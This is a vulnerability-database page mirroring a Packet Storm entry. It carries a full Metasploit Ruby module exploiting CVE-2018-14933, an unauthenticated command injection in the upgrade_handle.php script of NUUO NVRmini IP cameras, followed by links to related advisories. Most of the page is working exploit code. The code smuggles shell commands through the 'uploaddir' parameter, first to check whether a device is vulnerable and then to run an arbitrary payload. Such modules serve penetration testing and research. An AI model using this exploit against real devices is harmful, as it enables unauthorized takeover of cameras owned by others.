Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormBerk DusunurPACKETSTORM:151573
HistoryFeb 07, 2019 - 12:00 a.m.

NUUO NVRmini upgrade_handle.php Remote Command Execution

2019-02-0700:00:00
Berk Dusunur
packetstormsecurity.com
225

EPSS

0.337

Percentile

97.1%

JSON
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'NUUO NVRmini upgrade_handle.php Remote Command Execution',  
'Description' => %q{  
This exploits a vulnerability in the web application of NUUO NVRmini IP camera,  
which can be done by triggering the writeuploaddir command in the upgrade_handle.php file.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Berk Dusunur', # @berkdusunur  
'numan turle' # @numanturle  
],  
'References' =>  
[  
['URL', 'https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'],  
['URL', 'https://www.tenable.com/security/research/tra-2018-41'],  
['CVE', '2018-14933'],  
['EDB', '45070']  
],  
'Privileged' => false,  
'Payload' =>  
{  
'DisableNops' => true  
},  
'Platform' => %w{ unix win linux },  
'Arch' => ARCH_CMD,  
'Targets' => [ ['NUUO NVRmini', { }], ],  
'DisclosureDate' => 'Aug 04 2018',  
'DefaultTarget' => 0))  
end  
  
def check  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, 'upgrade_handle.php'),  
'vars_get' =>  
{  
'cmd' => 'writeuploaddir',  
'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'"  
}}  
)  
  
unless res  
vprint_error 'Connection failed'  
return CheckCode::Unknown  
end  
  
if res.code == 200 && res.body =~ /upload_tmp_dir/  
return CheckCode::Vulnerable  
end  
  
CheckCode::Safe  
end  
  
def http_send_command(cmd)  
uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php")  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => uri,  
'vars_get' =>  
{  
'cmd' => 'writeuploaddir',  
'uploaddir' => "';"+cmd+";'"  
}}  
)  
  
unless res  
fail_with(Failure::Unknown, 'Failed to execute the command.')  
end  
  
res  
end  
  
def exploit  
http_send_command(payload.encoded)  
end  
end  
`

Related

metasploit 1
nvd 1
exploitdb 1
prion 1
cve 1
cvelist 1
zdt 1
openvas 1
metasploit
metasploit
NUUO NVRmini upgrade_handle.php Remote Command Execution
2018-12-06 02:51:10
nvd
nvd
CVE-2018-14933
2018-08-04 19:29:00
exploitdb
exploitdb
NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)
2019-02-11 00:00:00
prion
prion
Command injection
2018-08-04 19:29:00
cve
cve
CVE-2018-14933
2018-08-04 19:29:00
cvelist
cvelist
CVE-2018-14933
2018-08-04 19:00:00
zdt
zdt
NUUO NVRmini upgrade_handle.php Remote Command Execution Exploit
2019-02-07 00:00:00
openvas
openvas
NUUO NVR RCE Vulnerability
2018-08-06 00:00:00

EPSS

0.337

Percentile

97.1%

JSON
Related for PACKETSTORM:151573
metasploit1nvd1exploitdb1prion1cve1cvelist1zdt1openvas1